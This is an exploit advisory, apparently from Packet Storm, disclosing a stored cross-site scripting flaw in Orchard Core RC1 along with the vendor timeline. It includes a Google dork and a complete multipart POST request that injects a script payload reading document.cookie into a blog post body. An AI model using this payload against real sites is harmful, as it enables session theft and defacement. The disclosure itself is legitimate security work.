Orchard Core RC1 Cross Site Scripting

🗓️ 12 May 2020 00:00:00Reported by SunCSRType

packetstorm🔗 packetstormsecurity.com👁 115 Views

Orchard Core RC1 Persistent Cross-Site Scripting vulnerability allows remote injection of arbitrary web scripts or HTML in blog content creation and editing

`# Exploit Title: Orchard Core RC1 - Persistent Cross-Site Scripting  
# Google Dork: "Orchardcms"  
# Date: 2020-05-07  
# Exploit Author: SunCSR (Sun* Cyber Security Research)  
# Vendor Homepage: http://www.orchardcore.net/  
# Software Link: https://github.com/OrchardCMS/OrchardCore  
# Version: RC1  
# Tested on: Windows  
# CVE : N/A  
  
### Vulnerability : Persistent Cross-Site Scripting  
  
###Describe the bug  
Persistent Cross-site scripting (Stored XSS) vulnerabilities in Orchard CMS - Orchard Core RC1 allow remote attackers to inject arbitrary web script or HTML  
via create or edit blog content.  
  
###To Reproduce  
Steps to reproduce the behavior:  
POST /Admin/Contents/ContentTypes/BlogPost/Create HTTP/1.1  
-----------------------------31063090348194141451329743365  
Content-Disposition: form-data; name="ListPart.ContainerId"  
  
4s5x3fv3qpsh7rwzvy069ykbxn  
-----------------------------31063090348194141451329743365  
Content-Disposition: form-data; name="TitlePart.Title"  
  
Test XSS  
-----------------------------31063090348194141451329743365  
Content-Disposition: form-data; name="AutoroutePart.Path"  
  
  
-----------------------------31063090348194141451329743365  
Content-Disposition: form-data; name="BlogPost.Subtitle.Text"  
  
  
-----------------------------31063090348194141451329743365  
Content-Disposition: form-data; name="MarkdownBodyPart.Source"  
  
<script>alert(document.cookie)</script>  
-----------------------------31063090348194141451329743365  
Content-Disposition: form-data; name="submit.Publish"  
  
submit.Publish  
-----------------------------31063090348194141451329743365  
Content-Disposition: form-data; name="__RequestVerificationToken"  
  
xxx  
-----------------------------31063090348194141451329743365--  
  
###Reference:  
https://github.com/OrchardCMS/OrchardCore/issues/5802  
  
### History  
=============  
2020-03-23 Issue discovered  
2020-03-27 Vendor contacted  
2020-04-22 Vendor response and hotfix  
2020-04-22 Vendor set patch milestone to rc2  
`

12 May 2020 00:00Current

7.4High risk

Vulners AI Score7.4